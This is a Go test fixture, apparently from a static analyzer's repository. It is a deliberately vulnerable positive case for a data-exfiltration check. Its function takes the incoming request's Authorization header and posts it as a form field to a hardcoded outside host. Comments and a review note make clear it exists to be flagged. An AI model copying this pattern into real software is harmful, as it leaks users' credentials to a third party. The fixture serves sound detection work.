mirror of
https://github.com/elicpeter/nyx.git
synced 2026-06-30 20:39:39 +02:00
// DATA_EXFIL fixture: a Sensitive (header) source flowing into the form
// payload of `http.PostForm` (arg 1, `url.Values`). The destination URL
// is hardcoded so SSRF does not fire; only the form-data path activates
// the body-position gate.
//
// Driven by `data_exfil_go_integration_tests.rs`.
package fixture
import (
"net/http"
"net/url"
)
// leakAuthHeader is the deliberately vulnerable body of this fixture: it
// copies the caller's Authorization header into the form payload of an
// outbound POST. It is a positive test case for the DATA_EXFIL check and is
// meant to be flagged by the analyzer, not fixed; rewriting the statements
// would change the shape the integration test exercises.
func leakAuthHeader(r *http.Request) {
	// Source: the Authorization header of the inbound request (the
	// "Sensitive (header)" source named in the file comment).
	auth := r.Header.Get("Authorization")
	// The header value becomes the "token" field of the form body.
	form := url.Values{"token": []string{auth}}
	// Sink: the tainted url.Values is the second argument (index 1) of
	// http.PostForm. The URL argument is a constant, so only the payload
	// carries request-derived data.
	// NOTE(review): the response and error are discarded and the response
	// body is never closed — presumably fine because the fixture is only
	// analyzed, not executed; confirm before copying this pattern into real
	// code, where the credential should not leave the service at all.
	http.PostForm("https://analytics.internal/track", form)
}